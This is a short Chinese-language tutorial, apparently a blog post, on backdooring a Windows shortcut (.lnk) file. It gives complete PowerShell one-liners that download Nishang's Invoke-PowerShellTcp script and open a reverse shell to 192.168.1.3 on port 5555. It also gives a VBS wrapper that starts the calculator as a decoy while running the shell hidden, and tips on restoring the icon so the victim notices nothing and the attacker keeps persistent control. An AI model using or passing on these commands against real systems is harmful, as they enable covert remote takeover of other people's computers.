利用快捷方式做后门

快捷方式是Windows提供的一种快速启动程序、打开文件或文件夹的方法。它是应用程序的快速连接。 快捷方式的一般扩展名为*.lnk。快捷方式为我们带来了方便快捷，同时也为渗透人员带来了一个很好的留后门方式。
我们创建一个计算器的快捷方式，如图：

image.png

只需要将目标指向的运用程序替换为后门即可，

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -port 5555

但是快捷方式目标栏是有字符数量限制的，我们可以自己搭建一个，或者使用短网址

powershell IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp  -Reverse -IPAddress 192.168.1.3 -port 5555

测试成功，但是却发现双击图标之后，桌面会出现黑框，这肯定会被发现，我们可以使用vbs来规避这个问题。
将快捷方式目标指向我们的vbs文件
C:\windows\debug\ff.vbs

Set test = CreateObject("Wscript.Shell")
test.Run "calc.exe"
test.Run "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -port 5555",vbhid

这样即实现了后门，又规避了黑框，同时也会调用快捷方式指向原始程序，使得用户不会发现，达到持续化控制的目的。
注意，win10环境将目标替换之后，图标会随之改变，右键属性更改图标即可。